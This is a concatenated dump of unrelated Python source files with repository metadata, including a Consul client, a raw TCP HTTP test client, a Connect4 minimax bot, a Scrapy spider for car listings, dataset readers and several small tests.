logging.debug('Blocking query to Consul HTTP API to wait for changes in the \'{0}\' key space...'.format(key_prefix))
# TODO: Timeout by default is 5 minutes. This can be changed by adding wait=10s or wait=10m to the query string
self._api_get('kv/{0}?index={1}'.format(key_prefix, self._last_known_modify_index))
def write_value(self, key, value):
modify_index = self._get_modify_index(key, True)
response = self._api_put('kv/{0}?cas={1}'.format(key, modify_index), json.dumps(value))
return response.text == 'true'
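# Minimal usage sketch (illustrative; config keys taken from this module, values assumed):
# consul = ConsulApi({'scheme': 'http', 'host': 'localhost', 'port': 8500,
#                     'version': 'v1', 'acl_token': ''})
# consul.check_connectivity()
# consul.write_value('deployments/my-service', {'status': 'pending'})
# consul.get_value('deployments/my-service')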
| 1.96875
| 2
|
others/tcptest/tcpconnector.py
|
1067511899/tornado-learn
| 1
|
12780105
|
import argparse, socket
from time import sleep, time, localtime, strftime
import time
import logging
import sys
import trace
fhand = logging.FileHandler('new20180321.log', mode='a', encoding='GBK')
logging.basicConfig(level=logging.DEBUG, # log level printed to the console
handlers=[fhand],
format=
'%(asctime)s - %(levelname)s: %(message)s'
                    # log format
)
def recvall(sock, length):
data = b''
while len(data) < length:
more = sock.recv(length - len(data))
if not more:
raise EOFError('was expecting %d bytes but only received %d bytes before the socket closed'
% (length, len(data)))
data += more
return data
header = '''
GET / HTTP/1.1\r\n
Host: 192.168.1.157:8000\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n
DNT: 1\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: zh-CN,zh;q=0.9\r\n
If-None-Match: "15e84b11ce57dec1b9483884f4e5587e71d5c201"\r\n
\r\n
'''
CRLF = "\r\n\r\n"
def client(host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
print('Client has been assigned socket name', sock.getsockname())
sock.send((header).encode())
print(header.encode())
reply = recvall(sock, 160)
print('reply', repr(reply))
sock.close()
def main():
print(strftime("%Y-%m-%d %H:%M:%S", localtime(time.time())))
try:
# client('172.16.17.32', 80)
client('192.168.1.157', 8000)
except Exception as e:
print(e)
logging.info(e)
if __name__ == '__main__':
print(strftime("%Y-%m-%d %H:%M:%S", localtime(time.time())))
    client('www.baidu.com', 443)
| 2.375
| 2
|
Inprocessing/Thomas/Python/baselines/POEM/DatasetReader.py
|
maliha93/Fairness-Analysis-Code
| 9
|
12780106
|
<reponame>maliha93/Fairness-Analysis-Code<gh_stars>1-10
import numpy
import os.path
import scipy.sparse
import sklearn.datasets
import sklearn.decomposition
import sklearn.model_selection
import sklearn.preprocessing
import sys
class DatasetReader:
def __init__(self, copy_dataset, verbose):
self.verbose = verbose
if copy_dataset is None:
self.trainFeatures = None
self.trainLabels = None
self.testFeatures = None
self.testLabels = None
else:
if copy_dataset.trainFeatures is not None:
self.trainFeatures = copy_dataset.trainFeatures.copy()
else:
self.trainFeatures = None
if copy_dataset.trainLabels is not None:
self.trainLabels = copy_dataset.trainLabels.copy()
else:
self.trainLabels = None
if copy_dataset.testFeatures is not None:
self.testFeatures = copy_dataset.testFeatures
else:
self.testFeatures = None
if copy_dataset.testLabels is not None:
self.testLabels = copy_dataset.testLabels
else:
self.testLabels = None
def freeAuxiliaryMatrices(self):
if self.trainFeatures is not None:
del self.trainFeatures
del self.trainLabels
del self.testFeatures
del self.testLabels
if self.verbose:
print("DatasetReader: [Message] Freed matrices")
sys.stdout.flush()
def reduceDimensionality(self, numDims):
if (self.trainFeatures is None) and self.verbose:
print("DatasetReader: [Error] No training data loaded.")
sys.stdout.flush()
return
LSAdecomp = sklearn.decomposition.TruncatedSVD(n_components = numDims, algorithm = 'arpack')
LSAdecomp.fit(self.trainFeatures)
self.trainFeatures = LSAdecomp.transform(self.trainFeatures)
self.testFeatures = LSAdecomp.transform(self.testFeatures)
if self.verbose:
print("DatasetReader: [Message] Features now have shape: Train:",\
numpy.shape(self.trainFeatures), "Test:", numpy.shape(self.testFeatures))
sys.stdout.flush()
def sanitizeLabels(self, labelList):
returnList = []
for tup in labelList:
if -1 in tup:
returnList.append(())
else:
returnList.append(tup)
return returnList
def loadDataset(self, corpusName, labelSubset = None):
trainFilename = '../DATA/%s_train.svm' % corpusName
testFilename = '../DATA/%s_test.svm' % corpusName
if (not os.path.isfile(trainFilename)) or (not os.path.isfile(testFilename)):
print("DatasetReader: [Error] Invalid corpus name ", trainFilename, testFilename)
sys.stdout.flush()
return
labelTransform = sklearn.preprocessing.MultiLabelBinarizer(sparse_output = False)
train_features, train_labels = sklearn.datasets.load_svmlight_file(trainFilename,
dtype = numpy.longdouble, multilabel = True)
sanitized_train_labels = self.sanitizeLabels(train_labels)
numSamples, numFeatures = numpy.shape(train_features)
biasFeatures = scipy.sparse.csr_matrix(numpy.ones((numSamples, 1),
dtype = numpy.longdouble), dtype = numpy.longdouble)
self.trainFeatures = scipy.sparse.hstack([train_features, biasFeatures], dtype = numpy.longdouble)
self.trainFeatures = self.trainFeatures.tocsr()
test_features, test_labels = sklearn.datasets.load_svmlight_file(testFilename,
n_features = numFeatures, dtype = numpy.longdouble, multilabel = True)
sanitized_test_labels = self.sanitizeLabels(test_labels)
numSamples, numFeatures = numpy.shape(test_features)
biasFeatures = scipy.sparse.csr_matrix(numpy.ones((numSamples, 1),
dtype = numpy.longdouble), dtype = numpy.longdouble)
self.testFeatures = scipy.sparse.hstack([test_features, biasFeatures], dtype = numpy.longdouble)
self.testFeatures = self.testFeatures.tocsr()
self.testLabels = labelTransform.fit_transform(sanitized_test_labels)
if labelSubset is not None:
self.testLabels = self.testLabels[:, labelSubset]
self.trainLabels = labelTransform.transform(sanitized_train_labels)
if labelSubset is not None:
self.trainLabels = self.trainLabels[:, labelSubset]
if self.verbose:
print("DatasetReader: [Message] Loaded ", corpusName, " [p, q, n_train, n_test]: ",\
numpy.shape(self.trainFeatures)[1], numpy.shape(self.trainLabels)[1],\
numpy.shape(self.trainLabels)[0], numpy.shape(self.testFeatures)[0])
sys.stdout.flush()
class SupervisedDataset(DatasetReader):
def __init__(self, dataset, verbose):
DatasetReader.__init__(self, copy_dataset = dataset, verbose = verbose)
self.validateFeatures = None
self.validateLabels = None
def freeAuxiliaryMatrices(self):
DatasetReader.freeAuxiliaryMatrices(self)
if self.validateFeatures is not None:
del self.validateFeatures
del self.validateLabels
if self.verbose:
print("SupervisedDataset: [Message] Freed matrices")
sys.stdout.flush()
def createTrainValidateSplit(self, validateFrac):
        self.trainFeatures, self.validateFeatures, self.trainLabels, self.validateLabels = \
            sklearn.model_selection.train_test_split(self.trainFeatures, self.trainLabels,
                test_size = validateFrac)
if self.verbose:
print("SupervisedDataset: [Message] Created supervised split [n_train, n_validate]: ",\
numpy.shape(self.trainFeatures)[0], numpy.shape(self.validateFeatures)[0])
sys.stdout.flush()
class BanditDataset(DatasetReader):
def __init__(self, dataset, verbose):
DatasetReader.__init__(self, copy_dataset = dataset, verbose = verbose)
self.sampledLabels = None
self.sampledLogPropensity = None
self.sampledLoss = None
self.validateFeatures = None
self.validateLabels = None
self.trainSampledLabels = None
self.validateSampledLabels = None
self.trainSampledLogPropensity = None
self.validateSampledLogPropensity = None
self.trainSampledLoss = None
self.validateSampledLoss = None
def freeAuxiliaryMatrices(self):
DatasetReader.freeAuxiliaryMatrices(self)
if self.sampledLabels is not None:
del self.sampledLabels
del self.sampledLogPropensity
del self.sampledLoss
if self.validateFeatures is not None:
del self.validateFeatures
del self.validateLabels
del self.trainSampledLabels
del self.validateSampledLabels
del self.trainSampledLogPropensity
del self.validateSampledLogPropensity
del self.trainSampledLoss
del self.validateSampledLoss
if self.verbose:
print("BanditDataset: [Message] Freed matrices")
sys.stdout.flush()
def registerSampledData(self, sampledLabels, sampledLogPropensity, sampledLoss):
self.sampledLabels = sampledLabels
self.sampledLogPropensity = sampledLogPropensity
self.sampledLoss = sampledLoss
if self.verbose:
print("BanditDataset: [Message] Registered bandit samples [n_samples]: ", numpy.shape(sampledLogPropensity)[0])
sys.stdout.flush()
def createTrainValidateSplit(self, validateFrac):
self.trainFeatures, self.validateFeatures, self.trainLabels, self.validateLabels, \
self.trainSampledLabels, self.validateSampledLabels, self.trainSampledLogPropensity, self.validateSampledLogPropensity, \
self.trainSampledLoss, self.validateSampledLoss = sklearn.model_selection.train_test_split(self.trainFeatures,
self.trainLabels, self.sampledLabels, self.sampledLogPropensity,
self.sampledLoss, test_size = validateFrac)
if self.verbose:
print("BanditDataset: [Message] Created bandit split [n_train, n_validate]:",\
numpy.shape(self.trainFeatures)[0], numpy.shape(self.validateFeatures)[0])
sys.stdout.flush()
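# Minimal usage sketch (illustrative; corpus name and split fraction are assumptions,
# and ../DATA/<corpus>_train.svm / _test.svm must exist):
# dataset = DatasetReader(copy_dataset=None, verbose=True)
# dataset.loadDataset('scene')
# supervised = SupervisedDataset(dataset, verbose=True)
# supervised.createTrainValidateSplit(validateFrac=0.25)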
| 2.5
| 2
|
codigo_das_aulas/aula_17/exemplo_09.py
|
VeirichR/curso-python-selenium
| 234
|
12780107
|
<gh_stars>100-1000
from selene.support.shared import browser
from selene.support.conditions import be
from selene.support.conditions import have
browser.open('http://google.com')
browser.element(
'input[name="q"]'
).should(be.blank).type('Envydust').press_enter()
| 2.078125
| 2
|
test-unit/PythonToJavascript/converters_test/DecoratorConverter_test.py
|
stoogoff/python-to-javascript
| 1
|
12780108
|
from utils import parseSource, nodesToString, nodesToLines, dumpNodes, dumpTree
from converters import DecoratorConverter
def test_DecoratorGather_01():
src = """
@require_call_auth( "view" )
def bim():
pass
"""
matches = DecoratorConverter().gather( parseSource( src ) )
match = matches[ 0 ]
assert nodesToString( match.at_sym ) == '@'
assert nodesToString( match.decorated ) == 'require_call_auth( "view" )'
assert str( match.newl ) == '\n'
def test_DecoratorProcess_01():
src = """
@require_call_auth( "view" )
def bim():
pass
"""
nodes = parseSource( src )
cvtr = DecoratorConverter()
matches = cvtr.gather( nodes )
cvtr.processAll( matches )
assert nodesToLines( nodes )[ 0 ] == """/* @require_call_auth( "view" ) DECORATOR */"""
| 2.625
| 3
|
tests/test_pycuda.py
|
karthik20122001/docker-python
| 2,030
|
12780109
|
<gh_stars>1000+
"""Tests for general GPU support"""
import unittest
from common import gpu_test
class TestPycuda(unittest.TestCase):
@gpu_test
def test_pycuda(self):
import pycuda.driver
pycuda.driver.init()
gpu_name = pycuda.driver.Device(0).name()
self.assertNotEqual(0, len(gpu_name))
| 2.640625
| 3
|
ode_explorer/utils/data_utils.py
|
njunge94/ode-explorer
| 3
|
12780110
|
<reponame>njunge94/ode-explorer
import os
import jax.numpy as jnp
from typing import List, Dict, Text, Any
from ode_explorer.types import State
__all__ = ["initialize_dim_names", "convert_to_dict", "write_result_to_csv"]
def initialize_dim_names(variable_names: List[Text], state: State):
"""
Initialize the dimension names for saving data to disk using pandas.
The dimension names will be used as column headers in the resulting pd.DataFrame.
Useful if you plan to label and plot your data automatically.
Args:
variable_names: Names of the state variables in the ODE integration run.
state: Sample state from which to infer the dimension names.
Returns:
A list of dimension names.
"""
var_dims = []
for k, v in zip(variable_names, state):
dim = 1 if jnp.isscalar(v) else len(v)
var_dims.append((k, dim))
dim_names = []
for i, (name, dim) in enumerate(var_dims):
if dim == 1:
dim_names += [name]
else:
dim_names += ["{0}_{1}".format(name, i) for i in range(1, dim + 1)]
return dim_names
def convert_to_dict(state: State, model_metadata: Dict[Text, Any], dim_names: List[Text]):
"""
Convert a state in a run result object to a Dict for use in a pd.DataFrame constructor.
Args:
state: ODE state obtained in the numerical integration run.
model_metadata: Model metadata saved in the run.
dim_names: Names of dimensions in the ODE.
Returns:
A dict containing the dimension names as keys and the corresponding scalar data as values.
"""
output_dict = dict()
variable_names = model_metadata["variable_names"]
idx = 0
for i, name in enumerate(variable_names):
v = state[i]
if jnp.isscalar(v):
k = dim_names[idx]
output_dict.update({k: v})
idx += 1
else:
k = dim_names[idx:idx + len(v)]
output_dict.update(dict(zip(k, v)))
idx += len(v)
return output_dict
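# Minimal usage sketch (illustrative; variable names and values are assumptions):
# state = (0.1, jnp.array([1.0, 2.0]))                      # e.g. (t, y)
# dim_names = initialize_dim_names(["t", "y"], state)       # -> ["t", "y_1", "y_2"]
# row = convert_to_dict(state, {"variable_names": ["t", "y"]}, dim_names)
# # row == {"t": 0.1, "y_1": 1.0, "y_2": 2.0}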
def write_result_to_csv(result: List[Any],
out_dir: Text,
outfile_name: Text,
**kwargs) -> None:
"""
Write a run result to disk as a csv file.
Args:
result: List of ODE states in the run result, in Dict format.
out_dir: Designated output directory.
outfile_name: Designated output file name.
**kwargs: Additional keyword arguments passed to pandas.DataFrame.to_csv.
"""
raise NotImplementedError
# if not os.path.exists(out_dir):
# os.mkdir(out_dir)
#
# file_ext = ".csv"
#
# # convert result_list to data frame, fast construction from list
# result_df = pd.DataFrame(data=result)
#
# out_file = os.path.join(out_dir, outfile_name)
#
# result_df.to_csv(out_file + file_ext, **kwargs)
| 3.03125
| 3
|
Connect4/minimax.py
|
iridia-ulb/AI-book
| 2
|
12780111
|
<reponame>iridia-ulb/AI-book
from bot import Bot
import copy
from common import MINIMAX, EMPTY, ROW_COUNT, COLUMN_COUNT, WINDOW_LENGTH
import random
import math
class MiniMax(Bot):
"""
This class is responsible for the Minimax algorithm.
    At each depth, the algorithm simulates up to 7 boards, one for each free column in which a piece could be dropped. So with depth 1 there are 7 boards to analyse, with depth 2: 49, and so on.
    Through a reward system each board is assigned a score. Minimax then either minimises or maximises that score depending on the depth (odd or even). Because several depths are explored, the
    algorithm alternates between simulating the possible moves of the current player and those of the adversary (creating min nodes and max nodes). The player who has to decide where to
    drop a piece on the current board is the maximising player, so the reward is maximised at max nodes. The algorithm also assumes that the adversary plays as well as possible (with
    the information available at the chosen depth) and therefore minimises the reward at min nodes.
    After building the tree, a board is selected at each depth based on its reward and the node type (min or max), starting from the bottom of the tree.
    The final choice is made among the 7 possible boards, with their scores updated through the reward procedure described above.
    Note that the larger the depth, the slower the execution.
    To avoid unnecessary exploration of boards, alpha-beta pruning has been implemented.
"""
def __init__(self, game, depth, pruning=True):
super().__init__(game, bot_type=MINIMAX, depth=depth, pruning=pruning)
def drop_piece(self, board, row, col, piece):
"""
Drop a piece in the board at the specified position
:param board: board with all the pieces that have been placed
:param row: one of the rows of the board
:param col: one of the columns of the board
:param piece: 1 or -1 depending on whose turn it is
"""
board[col][row] = piece
def get_next_open_row(self, board, col):
"""
Return the first row which does not have a piece in the specified column (col)
:param board: board with all the pieces that have been placed
:param col: one of the columns of the board
:return: row number
"""
for r in range(ROW_COUNT):
if board[col][r] == 0:
return r
def winning_move(self, board, piece):
"""
Check if the game has been won
:param board: board with all the pieces that have been placed
:param piece: 1 or -1 depending on whose turn it is
"""
# Check horizontal locations for win
for c in range(COLUMN_COUNT - 3):
for r in range(ROW_COUNT):
if (
board[c][r] == piece
and board[c + 1][r] == piece
and board[c + 2][r] == piece
and board[c + 3][r] == piece
):
return True
# Check vertical locations for win
for c in range(COLUMN_COUNT):
for r in range(ROW_COUNT - 3):
if (
board[c][r] == piece
and board[c][r + 1] == piece
and board[c][r + 2] == piece
and board[c][r + 3] == piece
):
return True
# Check positively sloped diagonals
for c in range(COLUMN_COUNT - 3):
for r in range(ROW_COUNT - 3):
if (
board[c][r] == piece
and board[c + 1][r + 1] == piece
and board[c + 2][r + 2] == piece
and board[c + 3][r + 3] == piece
):
return True
# Check negatively sloped diagonals
for c in range(COLUMN_COUNT - 3):
for r in range(3, ROW_COUNT):
if (
board[c][r] == piece
and board[c + 1][r - 1] == piece
and board[c + 2][r - 2] == piece
and board[c + 3][r - 3] == piece
):
return True
return False
def is_terminal_node(self, board):
"""
Determine whether the game is finished or not
:param board: board with all the pieces that have been placed
:return: boolean indicating whether the game is finished or not
"""
return (
self.winning_move(board, self._game._turn * -1)
or self.winning_move(board, self._game._turn)
or self.get_valid_locations(board) is None
)
def evaluate_window(self, window, piece):
"""
Evaluates the score of a portion of the board
:param window: portion of the board with all the pieces that have been placed
:param piece: 1 or -1 depending on whose turn it is
:return: score of the window
"""
score = 0
opp_piece = self._game._turn * -1
if piece == self._game._turn * -1:
opp_piece = self._game._turn
if window.count(piece) == 4:
score += 100
elif window.count(piece) == 3 and window.count(EMPTY) == 1:
score += 5
elif window.count(piece) == 2 and window.count(EMPTY) == 2:
score += 2
if window.count(opp_piece) == 3 and window.count(EMPTY) == 1:
score -= 4
return score
def score_position(self, board, piece):
"""
Main function that handles the scoring mechanism.
Computes the score used by the minimax algorithm; the score is computed independently of which piece has just been dropped. It is a global score that looks at the whole board.
:param board: board with all the pieces that have been placed
:param piece: 1 or -1 depending on whose turn it is
:return: score of the board
"""
score = 0
# Score center column
center_array = [int(i) for i in list(board[COLUMN_COUNT // 2][:])]
center_count = center_array.count(piece)
score += center_count * 3
# Score Horizontal
for r in range(ROW_COUNT):
row_array = [int(i) for i in list(board[:][r])]
for c in range(COLUMN_COUNT - 3):
window = row_array[c : c + WINDOW_LENGTH]
score += self.evaluate_window(window, piece)
# Score Vertical
for c in range(COLUMN_COUNT):
col_array = [int(i) for i in list(board[c][:])]
for r in range(ROW_COUNT - 3):
window = col_array[r : r + WINDOW_LENGTH]
score += self.evaluate_window(window, piece)
# Score positively sloped diagonal
for r in range(ROW_COUNT - 3):
for c in range(COLUMN_COUNT - 3):
window = [board[c + i][r + i] for i in range(WINDOW_LENGTH)]
score += self.evaluate_window(window, piece)
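# Score negatively sloped diagonal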
for r in range(ROW_COUNT - 3):
for c in range(COLUMN_COUNT - 3):
window = [board[c + i][r + 3 - i] for i in range(WINDOW_LENGTH)]
score += self.evaluate_window(window, piece)
return score
def minimax(self, board, depth, alpha, beta, maximizingPlayer, pruning):
"""
Main function of minimax, called whenever a move is needed.
Recursive function, depth of the recursion being determined by the parameter depth.
:param depth: number of iterations the Minimax algorithm will run for
(the larger the depth, the longer the algorithm takes)
:param alpha: used for the pruning, corresponds to the lowest value of the node's value range
:param beta: used for the pruning, corresponds to the highest value of the node's value range
:param maximizingPlayer: boolean to specify if the algorithm should maximize or minimize the reward
:param pruning: boolean to specify if the algorithm uses pruning
:return: tuple (column where to place the piece, score of that move)
"""
valid_locations = self.get_valid_locations(board)
is_terminal = self.is_terminal_node(board)
if depth == 0:
return (None, self.score_position(board, self._game._turn))
elif is_terminal:
if self.winning_move(board, self._game._turn):
return (None, math.inf)
elif self.winning_move(board, self._game._turn * -1):
return (None, -math.inf)
else: # Game is over, no more valid moves
return (None, 0)
column = valid_locations[0]
if maximizingPlayer:
value = -math.inf
turn = 1
else:
value = math.inf
turn = -1
for col in valid_locations:
row = self.get_next_open_row(board, col)
b_copy = copy.deepcopy(board)
self.drop_piece(b_copy, row, col, self._game._turn * turn)
new_score = self.minimax(
b_copy, depth - 1, alpha, beta, not maximizingPlayer, pruning
)[1]
if maximizingPlayer:
if new_score > value:
value = new_score
column = col
alpha = max(alpha, value)
else:
if new_score < value:
value = new_score
column = col
beta = min(beta, value)
if pruning:
if alpha >= beta:
break
return column, value
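# A minimal usage sketch (illustrative only: `game` is assumed to be the game object the
# Bot base class expects, and `board` a board indexed as board[col][row] as above):
#
#   bot = MiniMax(game, depth=4, pruning=True)
#   col, score = bot.minimax(board, 4, -math.inf, math.inf, True, True)
#   # `col` is the column where the maximising player should drop the next piece.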
| 3.859375
| 4
|
codCesarList.py
|
lorena112233/pythonDay1
| 0
|
12780112
|
<reponame>lorena112233/pythonDay1
listAbecedario = [ "a","b","c","d","e","f","g","h","i","j","k","l","m","n","ñ","o","p","q","r","s","t","u","v","w","x","y","z" ]
desplazamiento = 60
respuesta = str(input("Que quieres traducir?: "))
textoCifrado = ""
for letra in respuesta:
if letra in listAbecedario:
posicion = listAbecedario.index(letra)
nuevaPosicion = posicion + desplazamiento
# here I define what happens when the position is greater than the length of the alphabet: wrap around to the start
while nuevaPosicion >= len(listAbecedario):
nuevaPosicion = abs(len(listAbecedario)-nuevaPosicion)
textoCifrado+=listAbecedario[nuevaPosicion]
else: # if I type a comma or a space, it is not translated; it is kept as-is because it is not in the alphabet
textoCifrado+=letra
print(textoCifrado)
#----------------------------------------------------------------------
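# Note: the while loop above wraps the position by repeated subtraction, which for a
# non-negative shift is equivalent to taking the result modulo the alphabet length.
# A sketch of the same computation:
#
#   nuevaPosicion = (posicion + desplazamiento) % len(listAbecedario)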
| 3.671875
| 4
|
Core/Block_9/R9001_Factory.py
|
BernardoB95/Extrator_SPEDFiscal
| 1
|
12780113
|
<gh_stars>1-10
from Core.IFactory import IFactory
from Regs.Block_9 import R9001
class R9001Factory(IFactory):
def create_block_object(self, line):
self.r9001 = _r9001 = R9001()
_r9001.reg_list = line
return _r9001
| 1.945313
| 2
|
notebooks/parsebat.py
|
NickleDave/conbirt
| 0
|
12780114
|
<filename>notebooks/parsebat.py<gh_stars>0
import numpy as np
from scipy.io import loadmat
def parse_batlab_mat(mat_file):
"""parse batlab annotation.mat file"""
mat = loadmat(mat_file, squeeze_me=True)
annot_list = []
# annotation structure loads as a Python dictionary with two keys
# one maps to a list of filenames,
# and the other to a Numpy array where each element is the annotation
# corresponding to the filename at the same index in the list.
# We can iterate over both by using the zip() function.
for filename, annotation in zip(mat['filenames'], mat['annotations']):
# below, .tolist() does not actually create a list,
# instead gets ndarray out of a zero-length ndarray of dtype=object.
# This is just weirdness that results from loading complicated data
# structure in .mat file.
seg_start_times = annotation['segFileStartTimes'].tolist()
seg_end_times = annotation['segFileEndTimes'].tolist()
seg_types = annotation['segType'].tolist()
if type(seg_types) == int:
# this happens when there's only one syllable in the file
# with only one corresponding label
seg_types = np.asarray([seg_types]) # so make it a one-element list
elif type(seg_types) == np.ndarray:
# this should happen whenever there's more than one label
pass
else:
# something unexpected happened
raise ValueError("Unable to load labels from {}, because "
"the segType parsed as type {} which is "
"not recognized.".format(filename,
type(seg_types)))
samp_freq = annotation['fs'].tolist()
seg_start_times_Hz = np.round(seg_start_times * samp_freq).astype(int)
seg_end_times_Hz = np.round(seg_end_times * samp_freq).astype(int)
annot_dict = {
'audio_file': filename,
'seg_types': seg_types,
'seg_start_times': seg_start_times,
'seg_end_times': seg_end_times,
'seg_start_times_Hz': seg_start_times_Hz,
'seg_end_times_Hz': seg_end_times_Hz,
}
annot_list.append(annot_dict)
return annot_list
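# A minimal usage sketch (the .mat filename below is hypothetical):
#
#   annot_list = parse_batlab_mat('annotation.mat')
#   first = annot_list[0]
#   print(first['audio_file'], first['seg_types'], first['seg_start_times_Hz'])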
| 2.953125
| 3
|
web/JPS_EMISSIONS/python/latest/powerplant_sparql_sync.py
|
mdhillmancmcl/TheWorldAvatar-CMCL-Fork
| 21
|
12780115
|
<filename>web/JPS_EMISSIONS/python/latest/powerplant_sparql_sync.py
import rdflib
import re
from datetime import datetime
class PowerplantSPARQLSync:
def __init__(self, powerplant):
self.powerplantIRI = powerplant
self.graph = rdflib.Graph()
self.graph.parse(self.powerplantIRI)
# self.powerplantIRI = powerplant
# self.powerplantName = powerplant[powerplant.rfind('#') + 1:]
# self.graph = rdflib.Graph()
# self.graph.parse("C:/TOMCAT/webapps/ROOT/kb/powerplants/{}.owl".format(self.powerplantName))
self.generationTechnologyMap = {
'Cogeneration': 'cogeneration',
'CombinedCycleGasTurbine': 'CCGT',
'GasEngine': 'Engine',
'OpenCycleGasTurbine': 'OCGT',
'SubCriticalThermal': 'subcritical',
'SuperCriticalThermal': 'supercritical',
'UltraSuperCriticalThermal': 'ultrasupercritical'
}
self.primaryFuelToFuelUsedMap = {
'natural_gas': 'gas',
'oil': 'oil',
'coal': 'coal',
'bituminous': 'coal',
'subbituminous': 'coal',
'lignite': 'coal',
'anthracite': 'coal',
'coal_biomass': 'coal'
}
def __del__(self):
pass
def getPowerplantInfo(self):
queryString = """
PREFIX j1: <http://www.theworldavatar.com/ontology/ontocape/upper_level/system.owl#>
PREFIX j6: <http://www.theworldavatar.com/ontology/ontoeip/system_aspects/system_realization.owl#>
PREFIX j8: <http://www.theworldavatar.com/ontology/ontoeip/powerplants/PowerPlant.owl#>
PREFIX j5: <http://www.theworldavatar.com/ontology/ontocape/upper_level/technical_system.owl#>
PREFIX j7: <http://www.theworldavatar.com/ontology/ontoeip/system_aspects/system_performance.owl#>
SELECT ?country ?capacityValue ?year ?primaryFuel ?genTech ?annualGenValue ?genCostValue ?emissionRateValue
WHERE
{{
<{0}> j1:hasAddress ?country .
<{0}> j6:designCapacity ?capacityIRI.
?capacityIRI j1:hasValue ?capacity.
?capacity j1:numericalValue ?capacityValue.
<{0}> j8:hasYearOfBuilt ?yearOfBuilt.
?yearOfBuilt j1:hasValue ?yearValue.
?yearValue j1:numericalValue ?year.
<{0}> j5:realizes ?generation.
?generation j8:consumesPrimaryFuel ?primaryFuel.
?generation j8:usesGenerationTechnology ?genTech.
?generation j8:hasAnnualGeneration ?annualGenIRI.
?annualGenIRI j1:hasValue ?annualGenValIRI.
?annualGenValIRI j1:numericalValue ?annualGenValue.
?generation j7:hasCosts ?genCostIRI.
?genCostIRI j1:hasValue ?genCostValIRI.
?genCostValIRI j1:numericalValue ?genCostValue.
?generation j7:hasEmission ?emissionRateIRI.
?emissionRateIRI j1:hasValue ?emissionRateValIRI.
?emissionRateValIRI j1:numericalValue ?emissionRateValue
}}
""".format(self.powerplantIRI)
queryResults = self.graph.query(queryString).bindings
# get country
country = re.search(r'/([a-zA-Z_]+)$', str(queryResults[0]['country'])).group(1)
# get capacity value
capacityValue = int(queryResults[0]['capacityValue'].toPython())
# get year
year = int(queryResults[0]['year'].toPython())
# get primary fuel
primaryFuel = re.search(r'#([a-zA-Z]+)$', str(queryResults[0]['primaryFuel'])).group(1).lower()
if primaryFuel == "naturalgas":
primaryFuel = "natural_gas"
elif primaryFuel == "coalbiomass":
primaryFuel = "coal_biomass"
# get generation
genTechRegexResult = re.search(r'#([a-zA-Z]+)$', str(queryResults[0]['genTech'])).group(1)
genTech = self.generationTechnologyMap[genTechRegexResult]
# get output_MWh (a.k.a. annual generation in knowledge base)
annualGenValue = float(queryResults[0]['annualGenValue'].toPython())
# fuel_used
fuelUsed = self.primaryFuelToFuelUsedMap[primaryFuel]
dict = {}
dict['country'] = country
dict['capacity_MW'] = capacityValue
dict['primary_fuel'] = primaryFuel
dict['generation_technology'] = genTech
dict['age'] = datetime.now().year - year
dict['output_MWh'] = annualGenValue
dict['fuel_used'] = fuelUsed
return dict
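# A minimal usage sketch (the IRI below is a placeholder, not a real knowledge-base entry):
#
#   sync = PowerplantSPARQLSync('http://www.example.com/kb/powerplants/Plant_1.owl#Plant_1')
#   info = sync.getPowerplantInfo()
#   # info -> {'country': ..., 'capacity_MW': ..., 'primary_fuel': ..., 'age': ..., ...}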
| 2.453125
| 2
|
quotesbot/spiders/autotalli.py
|
Martynasvov/testinisprojektas2
| 0
|
12780116
|
# -*- coding: utf-8 -*-
import scrapy
class AutotalliSpider(scrapy.Spider):
name = "autotalli"
allowed_domains = ["autotalli.com"]
current_page = 1
start_url = 'https://www.autotalli.com/vaihtoautot/listaa/sivu/{}'
start_urls = [start_url.format(1)]
def parse(self, response):
skelbimu_linkai = response.css('a.carsListItemNameLink::attr(href)').extract()
for link in skelbimu_linkai:
yield scrapy.Request(url=response.urljoin(link), callback=self.parse_skelbimas)
if skelbimu_linkai:
self.current_page += 1
yield scrapy.Request(url=self.start_url.format(self.current_page), callback=self.parse)
def parse_skelbimas(self, response):
kaina = response.css("div.carPrice span::text").extract_first()
title = response.css('h1.carTitlee::text').extract_first()
kilometrazas = {}
for carDetailsLine in response.css('div.carDetailsGroup div.carDetailsLine'):
name = carDetailsLine.css('div.label::text').extract_first()
if name == 'Mittarilukema':
value = carDetailsLine.css('div.value::text').extract_first()
kilometrazas.update({name.strip(): value.strip()})
photo = response.css('div.image img::attr(src)').extract()
yield {
'kaina': kaina,
'skelbimo_pavadinimas': title,
'kilometrazas': kilometrazas,
'fotkes': photo
}
| 2.734375
| 3
|
tests/test_metrics.py
|
mlrun/metrics-gen
| 0
|
12780117
|
<gh_stars>0
from metrics_gen.deployment_generator import deployment_generator
from metrics_gen.metrics_generator import Generator_df
import pandas as pd
import yaml
def get_deployment(configuration: dict) -> pd.DataFrame:
dep_gen = deployment_generator()
deployment = dep_gen.generate_deployment(configuration=configuration)
return deployment
class TestMetrics:
configuration: dict = yaml.safe_load(
open(
"./tests/test_configuration.yaml",
"r",
)
)
metrics_configuration: dict = configuration.get("metrics", {})
deployment: pd.DataFrame = get_deployment(configuration)
def test_metric_as_dict(self):
met_gen = Generator_df(self.configuration, user_hierarchy=self.deployment)
generator = met_gen.generate(as_df=False)
assert generator, "No generated data was created"
def test_metric_as_df(self):
met_gen = Generator_df(self.configuration, user_hierarchy=self.deployment)
generator = met_gen.generate(as_df=True)
assert generator, "No generated data was created"
| 2.3125
| 2
|
mobilebdd/reports/jsonifier.py
|
PhoenixWright/MobileBDDCore
| 0
|
12780118
|
import json
from mobilebdd.reports.base import BaseReporter
class JsonReporter(BaseReporter):
"""
Outputs the test run results in the form of JSON.
One example use case is to plug this into a BDD API that returns the results
in JSON format.
"""
def __init__(self, config):
super(JsonReporter, self).__init__(config)
def get_json(self):
"""
:return: json payload of the test results
:rtype: str
"""
return json.dumps({u'features': self.features})
| 2.71875
| 3
|
pymatgen/io/cube.py
|
Crivella/pymatgen
| 921
|
12780119
|
<gh_stars>100-1000
"""
Module for reading Gaussian cube files, which have become one of the standard file formats
for volumetric data in quantum chemistry and solid state physics software packages
(VASP being an exception).
Some basic info about cube files
